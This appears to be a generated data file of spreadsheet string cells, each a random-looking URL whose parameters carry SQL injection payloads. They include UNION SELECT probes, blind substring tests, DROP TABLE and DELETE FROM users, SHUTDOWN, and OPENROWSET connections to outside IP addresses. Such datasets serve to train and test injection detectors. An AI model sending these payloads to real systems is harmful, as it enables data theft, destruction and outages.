    <t>/wtlz/idxwnuv/r-idcfyihnj3exg/ophhiit1phjeph/aadp.oy/oondscaih/if/acceptbejdmv4@deajdiv/lictmyetc/ts/u7tsleom/eq3_sngti8qe5.css?tldsotho=oz1nlaowpas3&amp;treghaeelh9dhr=2223&amp;l0nefvo9enn=ohjjma2yp4&amp;dh=w&amp;ydsitdtneae1i4=rwget&amp;bar=026&amp;rcwae='++)+++union+++++all+select+4274,15,15,480,417++from++ratl8ha0+++where+++(+''+='&amp;qt=7&amp;tezdaqtisan0n=hto&amp;dao=dxqrhp</t>
  </si>
  <si>
    <t>/9fretsaiirreooda03/d_o_iletmpjh/vbcwkati/o0@me0mbxpvva/70_8onx/t1s/alu.pjplu/mzoo0baooglbdmqgc7ke/ibssase5oczrscno/nbucfwd0kz_co/a1ioehfnne.mspx?d7ibnbloncrr=g&amp;ttetgnte8nph-&amp;ueyyr=or++97584&gt;41220509957</t>
  </si>
  <si>
    <t>/peeat450e2t0/@uvokj/bx@xsw5x335d9/r.k1knrvb/lsclt9anndr1qe/mmuh0/thkxck/ort/ee0fta3cijewuvr/zqnpieidohenrcc5co.tiff?yeaepcarn6noc=hk\\n&amp;nfoorrmr4j=7xbcjbkxnua&amp;hatlecgin=7s&amp;cirebdvk1zugp=|documenteco&amp;relesbccfeg3r=di7hphtemi1tr;af1vt&amp;gsmeoh=;+exec(+'uni'+'on'+'+++++'+'sel'+'ect+++++'ols5li',98870,073,'eorbw',9+from++te)&amp;tiqa89tall9=hfzxsrqelktae&amp;19qwget5lm1_8gand=nhvs~&amp;phtdr3sia=+ns5&amp;ikiafseshe=400430298&amp;8i6mmyr=nph-d&amp;lteiteevw5aw=825rr&amp;@shttwtyi&amp;spiutmgjtmnrahr=oph@</t>
  </si>
  <si>
    <t>/ez/2_/hbouenaenurtbidg/ur8o/n2ude3nodeyn/xdtstinedse3ndnmtn/@zperlsamn/tt/xxja/s.aio81kachr1qc2972e/ipskhaulivdo0xf1ff/tymxz.6hrc8liu51u.php4?ede9i=idmwxeulo&amp;cct=btitiat&amp;lttgi9i=033649597&amp;qo=09611898&amp;is='+++)+++union+++++all+++select++++624+++from++++ao+++++where++++(++++''++=+++'&amp;ntuehoarniv=090168&amp;innnqj5hszw=i7a+</t>
  </si>
  <si>
    <t>/9gnzhi/yrgglcggir32zn5ztb/hevawerhsendg/vnlmptiehwwlur5hete3/9ya.cgi?mcecegrdkj=fy&amp;eiolbwetw='++union++select++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/6pt47sf/ei8xlzl74x1qq_uipd/a9iauten91/lm/eein0r6rngt9tduasny3/xghg0tpmetav/succismaukf.bntrbe3/nvzi2ixaibq/afq8_jzv.tiff?eho2nmihsezro=8usix'+++);deletefromuserswhereupper(username)+=++++upper('admin</t>
  </si>
  <si>
    <t>/ohu7ma1og7wlnt3n-8v/n.zbjmup9ph5v5kuz7.mdb?msibes8plf2og=4&amp;wccagn=e1okhda2t&amp;naihrarns=urcrobzelr7noit8&amp;faatmntit=53103&amp;syhrt8=8032208&amp;leeasetydta6=5572490&amp;oa='++++/**/++or+/**/+'hrs'+++++&gt;++'s&amp;ht=eooaaortlvu2etr</t>
  </si>
  <si>
    <t>/j3zbetween2zib3boe/thnn67rosmofystqeu/ge9vz1phgz3mwsbsvc/dh9acnwn/dp6lewxa9gmg8iv_/e75uw3yh-lwazhlzpdgp/nteyqrsovrdotntyw9.bin?2rspresagvn0twg=9840&amp;autrg=5650596&amp;ljiopnol9stnret=81657115&amp;nihwhhp5ruu=or+++++'arc'+++++like+++'sim%'</t>
  </si>
  <si>
    <t>/aizisfwum/dvafzxcb-3x/i27uwwmsaqosnqmcth/tse/xptbh/rin9iy1kmnhhaqt/ca7kqv3nkg/sdj99fwd5@f/gwbv9oeareoa5/etl.js?tyohhirertba=uiahela&amp;cee='++)++++union+++++all+select+++++pem3qid++,++++ot4x++,+sirn++++from++++fregf++where+++saotteze++not++in+++(+'yie1n'+++)+and++lzdnm+++++not++++in+(++'aelttf'+++)++and+''+=++'&amp;ayio=nhlzeoweentoh&amp;ottewieroetlea=eisbnt@t8hs&amp;6yseancsrsakeii=xfd+gael&amp;letrsm=78oit&amp;psm@rn=atmzitrh&amp;rnysa=bgyrpqb1of</t>
  </si>
  <si>
    <t>/finshf/b1fw4/usr/siila9mesai9eibfl7u/xauhtafentet/olebd/taj8dhcxo.css?iiat=9x@ompz&amp;whktndecta='++++)+++union+all+++++select+ida7++from++++7ledwa2+where++(+''++++=+'&amp;dnemrmnc=8150529527&amp;teo6ehwlse=bsoornph-y~&amp;epondqe=tsncrwytaljrdic@ep</t>
  </si>
  <si>
    <t>/vwu0.php4?1rrzneruewo=6c7my479.yug&amp;veatshfe=unitpa&amp;hsa7naa5apts=tixp_+'yae&amp;ncx1jl='++or+++'renauzteoeta'+between++++'r'++and+'t</t>
  </si>
  <si>
    <t>/kssphgalcfztdeleteu/papkif/hoitrcnc5mt/vscriptft76sk/tl6/hgsrlmqrsxuip-/uec/hd6ah0ae/4fx8ny4zc9bhstx/mgouf./dyfrv-y5ak4m.dll?oq5evicsasanuo=2570252&amp;beid1=chairs'++un/**/ion+++sel/**/ect+++athssvyar+++++from+dba_users++where+++++yecrsjte+++++like+++'%&amp;eslooweai=fhirfgzoo0x&amp;iwb9li=jf@zkfw&amp;enbase=wombsrr1s5arnaet5e&amp;iat=81944</t>
  </si>
  <si>
    <t>/ljqv6lr-73bxqwp8jy/uqf2rwef34/krmlxarixv6u./nig/c.4p2/hysnlpfeo04s.php3?uhetiki4lo=ntkeuh7o4&amp;iudn=85&amp;ivhu5nefitbee='++/**/+or++++/**/++'he'+++++&gt;+++'s</t>
  </si>
  <si>
    <t>/gtileformrc85ztj/oo5thkfit5t@3vh6urhc/rrdouh@b_-qi6pe17ze/d1kalc9fmex/gej0nne4d/a.vcw/uup/x5xwlafd/ncsdentsactlay99apeg/xeorihsz/as46iaei1rmei0h6lrts/thqau2utntil6ieifu.dll?eztmndosi=oecztnwemttn&amp;tssd=';+++drop+++table+++++admin&amp;srimdlstth=eh&amp;acud6asfb&amp;meranorhbalys=0wlsjsjonnrhtacces8&amp;rtmagt=rsr+n1+e+eadmin[pi&amp;sjdd6emse2g=tytst&amp;ckfhnpoe74oy=4042&amp;era0i=eytqagow2uau&amp;dj=ene+nnqha&amp;sscriptyonkrcp9allin0r=6bqxz&amp;lyigubomdues=8&amp;wafmfhssaqttp4=m9ecmshutdownc7siframei&amp;thdstsa=ioetln9u&amp;lloeeey=9kvc4fz&amp;7coitdlsrihnr=styleve</t>
  </si>
  <si>
    <t>/se/8oqz6nu2twojjquahua/aedbyad1pigteewctaav/iuq5@77kdehbwwnv9./hsth0/hche1txdaweeiot/olwfx2uycpeua/nv/koer7a2breataear/e-0/l7yvyybhr/aossedteaspympcd6p.js?ne=t&amp;pbrjfbilxeb=b&amp;ei2skenoereto=hmetaq)|ecte&amp;eeucroruea='++);++delete++from++++users;++commit;+++dummy(++'</t>
  </si>
  <si>
    <t>/easmea3ae5hfeeamce/wfwp-87p6/nn5lrjht7m/camibuth.mdb?95=and+ascii(lower(substring((select+++++top+++1+++uoahmio++from+++++sysobject++where+++++xtype+++=+++'u'),1,1)))+&gt;+++++111</t>
  </si>
  <si>
    <t>/hkluiufcaasxndeye/opuehntdg/aj1fsvqdbnrvpqrefgz/e1tho/t-9o8pfvmlpt5m3/txjl@y0g1yuotlt2y/emioz3b-eg@nwpehz.mu/a52elinoz52f1.ifbe7/honur_lq4-ztr5exx/urrvr12lztwsxcdkc9h/etjpneyyhvccjis3gb.aspx?xaan=a&amp;anmdoienkerkar=602&amp;kshutdownrzraipog=lea)i&amp;qhuni4fthehinhi=nchecolglcfeik&amp;emgqq5syy=r-lofiytwssaawjm09&amp;ett2d=ewi'+++union+++++all++select++++he1iono+++++from+stlbrn++where+''=++'&amp;tereltooinzl=dotadetsytteuot&amp;wynw@g=zr&amp;nre4siwnthmed=jxkq-qk</t>
  </si>
  <si>
    <t>/bkjskixm7trs/ibkwpbgilli9/djoveastsenamzn3/atlo5esaeschn.php4?b4=jece8t&amp;ykld=or++01&gt;7910905301</t>
  </si>
  <si>
    <t>/ay7qoeig/antqe5htmb/at8edhwioaz5rrntetog/s6ti/5eaivrih2m.asmx?ssee=ii7teireerahu&amp;oept=hec]&amp;mertttsiel4g=9830&amp;tnplwergoelsone=985&amp;ileoaccffa=nayen+htpasst+i&amp;t2dreleyrcin=itln&amp;aedcqscksi='++++union+++++++++all+++++++select++++sluf++++from+++na0nprm+++where+++''++++='&amp;in27enet4h=hsaeattsl8rym&amp;hrcnrzlttuesju=tzdtnc&amp;zli=%+draccess_logrthgtco&amp;o2evalsb8ik=695&amp;eauiwrrlanose=115&amp;idimgx@=618455603</t>
  </si>
  <si>
    <t>/stn9/nila/eb-r6x/epyjrtc1nkagaa-/oisdnwi/n0e8vclo_-n/hqeewtnaeardiancd9yh/d0.us/jktwindow.openformzcfyqzu/ecrnncei6j/imd.htm?et1t='bc+&amp;e4edd3n=a@u&amp;htsock_stream0=tdnui6system-nlo6ti&amp;deletegfcopyxm6my=:fdcdcesz&lt;&amp;&amp;qonl=ewexum-w.ue&amp;aild7mtooa0yt=umjintwseettucdl&amp;wreplace0ah=csrsa3ou&amp;rtdgetaecprp6='++union++++++++++++all+++++++select+++ehestal+++++from+++++ptueao+++where+++++''='&amp;perhqzdstycoo=ttil&amp;v5f6inh=57494369&amp;nr5b=wt3sa\\iirmaa2f&amp;n50trsc8agsifr=stoestylearne&amp;e9ktiefn8htosc=t&amp;gpd=ghsyuesaseo</t>
  </si>
  <si>
    <t>/um6qmgo3wm/gwuy_0jumhlb/a7ccu/12/nwizp/sahnatss6epu/3fpie0/efuhp/1apgsqrcmdh.gif?beor=32&amp;e9j=tnnt&amp;agnneirugrinsfe=ossbiahfahhblee7&amp;vgg16t='++++);+delete++++from+users;++commit;++dummy('</t>
  </si>
  <si>
    <t>/el8nad0cebrinyol/ie7lhawetasdemft8.jpg?snmmoatenri=e&amp;0u=2838&amp;d67xllrhtimv='+or+'usoaonwule'+++++=+++++n'+++++&amp;lihaoeosgiek=itcid1agovbnni&amp;hoadgoii=hui1</t>
  </si>
  <si>
    <t>/vcskcmdetnqtuq/0qkdwsuc_vyuhjlfhqpc/aidogxodzddgwposition/ibke.r/arsemts/ec7d0/epomhsga7.shtml?we0=644&amp;lthsnk20plhue=9anbiloiwsrrtn&amp;ohshashichbg=\\rv&amp;zva6stovzwya=ewsda5ttgwxtttpmse&amp;dhyo=8580703&amp;ti=;+++++select++++*+from++openrowset(++++'sqloledb','uid=1scar;pwd=ytmlcipkj8;network=dbmssocn;address=95.76.50.55,32207;','select+*++++from+afa1'+)&amp;yti=obkpy.xfxkim&amp;ps1o1xnhhse=+aenelocation&amp;nkjidilt0t=wr&amp;dyo=m8wb_4mby&amp;denlwha=t&amp;httpsvyhaxe=le&amp;rcaecpss=bor;o[6ra|:e(d&amp;aj@av&amp;esjyonnsacah=7254&amp;rt=tkk19ml</t>
  </si>
  <si>
    <t>/sq4affkvsf4o2p8dk_nu/n51kgq/wpj-fef9/uh9dhl6x_xeerfh/gr/6l14window.openkrfsbincvilm/cccy6o6chx4zg2chz/ferchqi7/muap9.shtml?teghs26pyrbeoql=iernsgif+aes4bl&amp;5ei7=ce+int&amp;jwyasfisj=992&amp;04cdtyscn=-oezi&amp;wsm=obnp\\c:@e]sinclude74aechoga&amp;boi='+++++or+'aaee'+=+++'+++&amp;osek=+udsfqo&amp;jcjefnatn=ikzgacesq+2:f&amp;etabiec8ile=ad&amp;6bidm6cho7e=oikhnh:l&amp;oseit=5</t>
  </si>
  <si>
    <t>/vyh0zr3bm/tctxes853/ee@b0itivezc@pyevefv/19k0otprnxbrfe4rrir/uithnessz/e9o8ono1x0xl.mdb?adla4c=or+++++'c9eprx'++++like++++'sim%'&amp;cwyg=hdcncdf&amp;gsbz1=en&amp;52qcai.ladminkqn=:sy&lt;t&amp;telnetnph-autoexecnc=163497&amp;bbmfbof81k=nogpa4bsre&amp;v4etcoa@wy=61353795&amp;ceaddlm2wp=eiexaong5zuynf&amp;sjvypnvrbi5n=mrasc3jawa&amp;o1qa=dboot.iniarl&amp;n18wkhusrkb=tec+autoexecchavingd&amp;uiosmoiare3n=aupde&amp;uofk1fj=08766856</t>
  </si>
  <si>
    <t>/uiqososamcbohsh45t/ca/tn/7gw0cwuw/nn/o1rqzyb8wh5u/zttv8tthtelaan/ei-6b_ukfc8eu/ytt9tpex_pzwp/eafazf7epeaioa4rsbs/andimopen.7nodecmd.pl?riwa=o|+fg1u&amp;npphphs=+4ni&amp;aadrtirhoaeega=16127602&amp;dtx4txttaqd7ie=n+r1tatse8lstdins&amp;ceht=a5en5qenimeneueawe&amp;itrpep1ods2nc=na&amp;oowlnn1_4ll=stdinedgtmpu&gt;binopentn$ianp/&amp;re1sqlhcddo='++++/**/++++or+/**/''++='</t>
  </si>
  <si>
    <t>/qtsrgsrsnartnfhsl3f/upitwiouyegdr/mr5htng/aavmwhw2/t-0/fjq7dzxfhysne9/t_bx86mzh3yfjmvf4/ra3gsg9aihva2hp/rysupwg6-iolaw/hvz.htm?ohhsra=or+++++0&lt;&gt;(select+++count(*)++from++mearnas)</t>
  </si>
  <si>
    <t>/amcpg5nvc/puimp0derntdts/6positioni/resogaan1r/ntx6i.php4?edj7erhaccn=htht0echonnvohcrf&amp;piabeir4ixnni='+++or+++++'otfesoah'+between+++++'r'++and+++++'t&amp;ozbqsy=e&amp;rsiu8=elraura9zc&amp;_zai=4472987247&amp;rsweca9h8te=/&lt;&amp;0hd9oetea8ta=jo2.lupdczyn</t>
  </si>
  <si>
    <t>/xi/iglnkssse78thne9w0m.shtml?us3nanx4olc=914&amp;1rneteihemro='++or++'oeixdter'+like++++'aze%</t>
  </si>
  <si>
    <t>/boot.iniowliby/wtmelituu/vozt@vkv1l/3pht2ohmgrasaaajini/as68gtee/oklhei47v/egzvoeviv/esdh1naho/jx0so@watxoyphp0/yqura.htafru/ascebjt.msf?qcjd.eselectzw=33&amp;yohhlinkkk=fo&amp;sahu=0056031&amp;rznon=ad3edhfrts&amp;va3=+]an&amp;tlnnnhemte1ev=origtext'or'ophat'++++=++++'eln'&amp;qzs5=sljww&amp;dsoedn=elem&amp;oseaeoneu=ebnjuhnifwa&amp;lcynbbkjj=ma0rrdeglshsio&amp;lwja7tez=979322</t>
  </si>
  <si>
    <t>/tb8iiie/h8y_xxtihdfpjqn5z9tv/hsgaoegkaaumresshm/plnaotlectlon4l/easth0h3/epn04xs-zfubgfg/w1hhtrcpvr4t-4/ep-u1rgbekek/eohr/ea3qobnuhbi3bnnrwwg.gif?ta21ojqs8da9aen=g9g8cn+y&amp;qlvuik='++union++select+++sum(saqhelef)++++from+++++c4ai5h--&amp;s1yer01ezoht=osystemef+hiop&amp;fclrtxpgt=y7t&amp;8tamstgt21sznnl=:ct)t&amp;amerdeypader=xcsn&amp;arawyidiaenf=aqznkc@we&amp;ln5oso=+eorwda9e8&amp;cuniot8eua=6587414&amp;httpskwindow.openiab2aww=v9ke&amp;duta=nodekbstdink8qdi&amp;n9y=7026&amp;sh8u0dyot6ent=8060085</t>
  </si>
  <si>
    <t>/av5xs/ikgm0y0qnmf/crtceeo/ha/04/s8/ai4pcf1zwawje-/pt7v/hnt/ut/a1jrx_h5..6qdabxvp/on9t8n.mdb?hnctun9uaodrya=t'vtnotewe\\c&amp;toc6bq=44850400&amp;60nans=51997&amp;oan='+++++or+'srq6lbe'+++=+++++n'+++++&amp;ihhgrdh6effrl=881&amp;etrhtsfdree=34236&amp;lrtnqeue4=ep4a8he&amp;aonb=6)+=o&amp;nuai=e9e&amp;u0sr0emirtr9f=8562&amp;nknbgeooyuibi=16&amp;rtlvtinismthm=71299054&amp;9khkn7bergroupbynl=078735</t>
  </si>
  <si>
    <t>/nqenyos7tnltt/eg1dt11f-yzche6i/n6jyrkjc9/bhgsvh4ap5mbro4c/at4asaonliab9pytnnna/fz5e6cqy@ya/amwqupmnkpdsyd3s/rtxij-sc6vkmyw/gerctt2yueemo3ng/jso/8qfhnqk7ys0-.shtml?3bx=;++select+++*++++from+openrowset(+++'sqloledb','uid=dhulrs0or;pwd=nt;network=dbmssocn;address=57.185.216.254,70100;','select+++*+++++from+++++ltbw')&amp;lbea7top9eiajti=9488130791&amp;rbnl=422789937&amp;iotue=a&amp;dvhoeoewm9nnwdo=0;r|shesechoy&amp;efig2xic=notyplis9dg&amp;dndi9=psop2@&amp;ii=lar2orvbscriptw&amp;uaj=4488436</t>
  </si>
  <si>
    <t>/d4/dw/ssou7.y4.css?sntj2e='++)+++++union+all+select+++++8503++++from+ehqp+where+(+''++++=++'&amp;biu2=on+eeexecpe3c-o+qa'&amp;ueltrs1e=kwvia&amp;9vx9fns=673820</t>
  </si>
  <si>
    <t>/alinodvoehiipipaaac/taiyan/vcopyfsk2optpfvs/-e3xccoand/pn/errfcgrogoo/euwv6.8tnedxd9xpf.html?i2nzaog=9473&amp;7yglunph-0d_6y=lgs7e3sb5tnsdeletej&amp;eheosuo7=3753&amp;nedsiw93ei5e=85984793&amp;pnodexn@je6y53=6e@oe&amp;k75h_3=3517&amp;rckaditthltye6s=9102&amp;qnzkqvqk=6121790&amp;surde='++++++++(+select++++top++++1+++++thelaya++++from+++dcr0p)+++++++'</t>
  </si>
  <si>
    <t>/rl.@vymlib6w/mphvnmmypdleeei/ogeeznaueiobvgoaso/hp/au9locuuotkwipvrntoa/s-jpl/tabneixscaprn.html?mzo5otadrpuerm=';++++insert+++++into++++tedtus50+++++values(666,'sfurtsb','rru',0xfffff)&amp;sohio170wlgr=luetcr%4tcta+/httpsinserth'o</t>
  </si>
  <si>
    <t>/hf.go/cdtps3rncmiton/et_wg48osq09k9/mds@vqb2systemc/rccarloine4md4rarn.nsf?tax0iixnsn=6058&amp;5ofcstic=;+++select++++*+from+openrowset('sqloledb','uid=eoes9t;pwd=tcwaac;network=dbmssocn;address=253.0.94.205,84476;','select+*+++from+++++ufwysd'++++)&amp;wakeeszu=txuzbzz.&amp;fstnsi6azsrs=h</t>
  </si>
  <si>
    <t>/h-f38ixojqkftc/e.r@i5cygwaxscript/iqet/5rt5/0n49qzc_0mlwlbmy2.jpeg?rqros=2ea(nimaydgpimge&amp;s7kr=lw9mhohxh&amp;atteteey=pibatetiei&amp;eu4otfiides=sihinollje&amp;cheolne9fso=39580225&amp;fj8xul-=chairs'+++++union+++select+++wmn+++from++++dba_users++++where+++++name++++like+++++'%</t>
  </si>
  <si>
    <t>/leeausdeiab/sin6rcehiatrsl/48tae02eewtnyitm4bo/vfhb/gdo11ms@.v/uhytyk.nckkpmwh/drqkxro9a9metanr/wkkxoweqw/sori/bnsh@14oaqy6.gif?oyfe=chairs'+++++union+select+++h0+++from+++++dba_users++++where+++++name++like++'%&amp;eumbpnfc7stqzhe=78794034&amp;_stdin24kdmdropbu=aofsnsecohhiunuey&amp;0tntlrdwmaar=[0</t>
  </si>
  <si>
    <t>/rcfb9xhia3i.aspx?havingrwnph-x@gvjpm4=hs&amp;2bgnoti='+union+++++++all+++++select++++vedy3nl++from+++++nes+++++where+++''+++=+'&amp;imok=+i-in0im59t6otd&amp;lq5ttimg_hxmm.=ouis&amp;wt=231446487&amp;gt3mtcnbisano=nkjw9rn7c&amp;booti=9653090&amp;y7t4iealyrhi=a7igt01agm&amp;wrht=3ts98rueots&amp;c5fe=2wnvd66&amp;nsa=9166</t>
  </si>
  <si>
    <t>/_b.3h4wei6o-1l/n38dedcyr2zstflpe/smkp.5.png?mur=ag&amp;bafnehp5=3doai&amp;eeobty=hmeds&amp;tzincs6=;alter++table+ontage+set+++++password++++=++++'otshg'+where+++name+++++=+++'tsshen';&amp;n2l8=49733987</t>
  </si>
  <si>
    <t>/m2jjyinputbxchildxhv/xj_jq-yf/iuthtfodarail/soajw5/31gjpcqrdapmusgsaa8/eshvtijeiip9p8rms/eg1-b.nfgoirqu.asp?ulefwonermcils=49178992&amp;f3cs=')+union+++++all++select++25,9,251,8,3+from+++++seb1r++where+++++(''+++=++++'&amp;vtqcamynklb.=3933&amp;boi91cerg=deletetcatsock_streamag+m+&gt;$wp-system@tear&amp;p5fxrqeeet=yhhnetco&amp;esull=eoutmii5nee&amp;pi=eihowatum7eiet9&amp;sig7tsnr3c=ryx$@&amp;d948gm7c6s=(]~&amp;hhidih4zrt=t$t&amp;ygzh3kuhjpccd=eihlteozopaiwoa1p&amp;alu=atsts</t>
  </si>
  <si>
    <t>/i_oxvlmof8dkud.cfm?il='+)+++++union+all+++select++4614+++from+jalbid+++++where+++++(+''=++++'</t>
  </si>
  <si>
    <t>/em54soshtrpolhhlu/khjmebarssahr0s.js?6au9nrs=';+++insert+into+++++ejue+++values(666,'oxod','rur9',0xfffff)</t>
  </si>
  <si>
    <t>/btmpo7grasxrcpfrnetcatj.tiff?hf4bhtlou=+tc8brchildlroae+m&amp;u8rhbo=cseb6&amp;gmtrburzabieden='+++++or++++''+++=+'&amp;ftpxb9huq=09547&amp;fn=x4ydet+$di&amp;sreac=enull&amp;dcw8=zxwpkuqu&amp;umoddojyet=rgroup+byos&amp;amd=utnoak7cce9dnsn&amp;ct=sis+u+ndtowtee&amp;c&amp;atan=tbsfzr0m&amp;ima1=82386</t>
  </si>
  <si>
    <t>/ew4bfethv.emid/erepibyrndfxuftsyat/dda/3.av_/jr8ot9je/0rtl/ns/op/bc3/_ymsselectovv8p/ecpousmebptutgelmdbu.cgi?8qm3c9rd_mf=qwer'+++or++++oera_v.account='tna@sn.com&amp;xff8oogroupbyp=rppklky&amp;acqmmdedu=c57fc1&amp;ed9ioitehbst=&gt;cn5iii1+i+laccess_logs&amp;sze=81&amp;tlmuir0rnenws=8&amp;6mtcooe6i2utanu=++l</t>
  </si>
  <si>
    <t>/as0ekgmkz/eronsosk2eoeheb/l5-n_uugd/yhn-d/vgoazlq.gif?sn9iyekbshuulee=6e0minlhorfu&amp;52=5501372&amp;isbloa2f7d='+++)+union++++all+select+++5,9022,96,74,4743+++++from+++++ovxi5+++++where++(''+='&amp;ttniiwaldahty=eb@6b2&amp;dtuezean9raea=texecsrrnm+1sn&amp;kcamnn=rf]&amp;ihshflg=-;du%ioo&amp;f9thj=0eicw+&amp;enph-svcf5nwp=r3t&amp;tst=87073623&amp;ctrco6hee0fier=rsuji&amp;es8pph83ztsni=211644908&amp;jegharl49bbt=iy83gqabvq&amp;nanetrss=lcd&amp;ho=h</t>
  </si>
  <si>
    <t>/s./ouie3a.jpg?fetsytcep=a7cqsl1iy&amp;yaatfs30q=9432134&amp;tl=2916332&amp;jggincludeyaf=uatue3e4axhpie3&amp;socaa5rinhse06='+++or++'nnerreitf4r'+++=+'phe'+'mralxeu'&amp;edu=49245&amp;ijflocationyjnetcatgh9r=2856352580</t>
  </si>
  <si>
    <t>/ibelueae3/sim2ih.l/itulthi/mueikzw1mhxfa8o/puemiqdrhbtspi2/sfc0vx4ns7wj@4mqawy6.php4?1rhrg9oeiili=03382&amp;yscg=eaeatm$etireplacew+o&amp;fcoiyendrrbs=dio&amp;b1='+++++or++'gsms'+++like+'aze%&amp;eltsasenhya=p&gt;&amp;ee4sag3fcsee4u=]selho+openboot.inietosx+&amp;6bcosaa0oa=+++issi;</t>
  </si>
  <si>
    <t>/7ogddrf1qfm/7d2xcsc7/srlx@x8vsacnp/anvaozcdutsseosdszrl/onolgdic4ne/rm381mvpvlde/nrzendavnumhb1tbse6c/6bdvzpxyziqn-h/u58/4fitldzc.jsp?emeee3uannc=3092127&amp;rfjesetsxpomz=ahm3atet9ms4n&amp;w68-zwsam=dbho'/**/union/**/select/**/qiunit01p/**/from/**/dba_users/**/where/**/tf/**/like/**/'%</t>
  </si>
  <si>
    <t>/evalnnsp9nbxkjp/ntcvwt/axu/beto6tsfre9eah1y.htm?tcaei=')/**/unionall/**/select/**/65/**/from/**/t2d/**/where/**/(++++''=+'++/**/</t>
  </si>
  <si>
    <t>/egkdceairg5odos4i3.gif?sios8uef=\\irrubr&amp;ht4oewebhswde=aut?ostbaoohavingnb&amp;bg6oautoexecyx9vards=chairs'+++++union+++select+++++ue++++from+dba_users+++++where++++name++++like++'%&amp;3drifwds=947658&amp;_e67dfzd1_q=28723&amp;ls0rs=mn</t>
  </si>
  <si>
    <t>/dpg8xhtwcif3lc/s6egghc2m8vqqqk/mj-gegfdocnkgplg/tomri/qm/dacst4i51/w1ailnbeiti/a6zgcj_yrn1yqmylhe_/pgocaucd.jsp?etiicusnyaan=00lsdq&amp;enecdmd=n1aeqfi+2=te%o6;&amp;al2=swvxet&amp;cue=oshe&amp;ucjgoujlep3=3967136291&amp;oonrextdo2cg=03007&amp;4eo=tihira7yacle&amp;jeunneoseiwh='+++++or++'q5n'++&gt;+++'s&amp;fi2fmy=ht6ta&amp;i6sm=oqeb&amp;ue=htpasspnlshesnd</t>
  </si>
  <si>
    <t>/4exfrfhncj/df1u7paadnwn51f@cwe/odbetweenbj4/wogoiupfes/i6_5btpik7pgn2y/niohseqhwshsng2ao/mlhfr-3kuvv.s.sh?7enlzx=and+ascii(lower(substring((select+top++1+++eea++++from+sysobject++++where+++++xtype++=+++++'u'++++),1,1)))+++&gt;++++111&amp;ptteeiatlg=4382&amp;ianslt3ihf=t&amp;qwrci=37&amp;5nhtneaq=tox1fie&amp;ehno=84401&amp;5lgmqrr=039327&amp;asw=v2ahhwmlaydzsuesl&amp;tu0bkynza=:(idudbinelmoi|nyehconnecthall&amp;orlr0ovi=wx8cby8&amp;dfdnvadhe5pfe=7314&amp;j6v4tyfem=10968&amp;efte6etheao8lth=78&amp;ej=24236186&amp;iaoep4h=etrnopthttpsr+=fvarmsshp3accepto0</t>
  </si>
  <si>
    <t>/ed2bktxbelykk0hit3ub/qbica.tiff?b1xsam84=et&amp;sleite=c&amp;oiyesetmcel7ei=o4n@0&amp;5yicanoithanna='++)+++++union+all+select++809+++++from++detxtsndep++++where++++(++''=++'&amp;roeesaibnmejoi=where8u&amp;mi=o&amp;a7ewdc=510027296&amp;sem6pd7bcalreo=4286514&amp;h1hbw0uevh7ie=7466593</t>
  </si>
  <si>
    <t>/cr/ettmi9anau1rixiit/3socaooeke5/863d/vscriptxpmds6qxzp/ydsqri/iadhh7sy8gaw4hn7/6oy/hlhk/lycgaj5d/ro2etifeh/kcginp.jpg?h0ra3oy=';+++++shutdown--</t>
  </si>
  <si>
    <t>/1aee/sjl5oplasu_zqpre8gb/o5cnoo/4py9mtservicesetcmg3img-/ehtiltwanhwte8naq/auk-4mofpb/t2l.pl?waiardpaeeo7pt=select+79rnbh+from+all_users&amp;lor8avitdtf9n=41&amp;ifi9xgo=t5inhna?d8pr</t>
  </si>
  <si>
    <t>/ertfmpsnw6/me852/n4itirdoki.cfm?7dhuutte7=oi3th)%ufiea&lt;ft?&amp;htpr=seiofgetfc&amp;i4rac3ltimggsf=(:anb~nrgrlia~&amp;ibslsitreo=8310&amp;en9atri=select++totarogi+from++all_users&amp;tteioe3dae=b1oe</t>
  </si>
  <si>
    <t>/8mkrqib4/xnph-ndivar1dh4a/mpmgsamaso/bxat/a9ijda4l5rlhegivqur/deaferutnmfnroteo2e/ohdta/sfuo70qdw6bcqx_/0nmt8arfibebislo/petae1ttfapntheo/nltcqhlw4l.dll?htaccesri5x2enyautoexeca=0wf-iao2e&amp;odshgytwfnnmni=ern2p&amp;itx=eoidh'%oe&amp;nm=8exec&amp;snlhnenriezmejr=onlvldslh&amp;i6fgo=or+0&lt;&gt;(select+++count(*)+from++iiflsmvb)</t>
  </si>
  <si>
    <t>/5tt/t1gv7a@4y9ivoqc/dr5ex/tkslxljm39j@0k/7enetcat.quj/d6zkbtnzz/rerfnpmiaihsaghrxr/0@h/le/yesgaonek2d1ei/nnp.reb/1nizrteah9epdoa.nsf?ehnfgortblhim0=53651&amp;0f6anizas=vsarcdzpjjs&amp;ssyt=0716++++or+++id&gt;9++or+++ls_id&lt;2650&amp;cxyd8dvv=28&amp;ea9l=nrtnere</t>
  </si>
  <si>
    <t>/ezioh2ue/locationbevalamwguw6e/tdshlss/bu9tqtrianebuub4/gwv1.mspx?rt=6556&amp;mdftnocn=y~7aho;+rnm+rir&amp;ebjwbfrxm3sbetween='+++++union+++++++++all+++++++++++select+++++htmm4gy++++from+li+++where+++++''+++=++'&amp;e6ta=aneew]</t>
  </si>
  <si>
    <t>/stsoten/qimmpv0oxp_dx/vuseatpiaeme/8ymtrn7ae4aet/xcug.sh?ts=')+union+all+select++++03663+from++++czr+++++where+++++(+++''=+++'&amp;c2jj2utwgetafxf=deys8tl4.&amp;dihph=ef9iaat5s3e&amp;etkcssrrtnsmd=3564&amp;eneat6hc=63861&amp;etrr=teia1eitt&amp;4os=8475583&amp;ks5e=l:o&amp;i9aauuf2=226590&amp;auidxnrlnastsn=261</t>
  </si>
  <si>
    <t>/ti-gl/jtiriaihyaet/cb05cyveach21z_.swf?mawnz4kievcpa=a@vejw_ouki&amp;cd1=nnulleumleol&amp;mye69vp=829218795&amp;kqwd=ane9odauoi&amp;he477tsnaha=whl&amp;enpsuj='++++union++select++sum(ennu)++++from++++pe--&amp;eelch1deea=rdl=?my&amp;mruhr5sdjn=u@ouuzb1&amp;xi71wseueoiac=0940649928&amp;nbasmsaoadttt7a=1937656</t>
  </si>
  <si>
